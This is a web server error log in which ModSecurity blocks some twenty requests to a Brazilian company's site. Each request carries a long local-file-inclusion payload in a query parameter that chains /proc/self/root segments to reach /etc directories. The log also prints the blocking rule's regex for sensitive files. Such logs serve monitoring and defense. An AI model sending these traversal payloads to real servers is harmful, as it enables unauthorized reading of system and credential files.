[Wed Mar 18 05:53:59.635638 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.243.128:40456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoJ-oXxyEfFpUF8f860wAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:01.121378 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:54216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoKda6ubjKNq_cu4ZkIAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:03.128558 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:54228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoK0zinOy1jxa1j4fgUwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:04.705221 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:54236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoLNa6ubjKNq_cu4ZkIwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:06.123340 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:54246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoLimAPhZkrhU8w4k80wAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:08.473996 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:54256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoLwkwaGbbGflqUZDfPgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:11.067064 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:38020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoMwkwaGbbGflqUZDfQAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:12.425312 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:38026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoNOoXxyEfFpUF8f862gAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:13.795646 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:38038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoNeoXxyEfFpUF8f863QAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:15.165097 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:38044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoN-yqAr6etmhZHNqJuwAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:16.531536 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:38052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoONa6ubjKNq_cu4ZkKAAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:17.839336 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:38060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoOfu8EFLIOrSqIpvUGAAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:19.174666 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:38076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoO8df6f5d65gmYZSgYAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:20.526706 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:47904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoPPu8EFLIOrSqIpvUGgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:24.052910 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:47916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoQEzinOy1jxa1j4fgVgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:25.483189 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:47932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoQdY0UrI5A3LftIxlFQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:28.394232 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:47948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoROoXxyEfFpUF8f864gAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:29.787506 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:45888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoRdY0UrI5A3LftIxlFgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:31.206885 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:45900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoR8df6f5d65gmYZSgagAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:32.579144 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:45914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoSAkwaGbbGflqUZDfSQAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:54:33.991034 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:45926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpoSda6ubjKNq_cu4ZkLgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
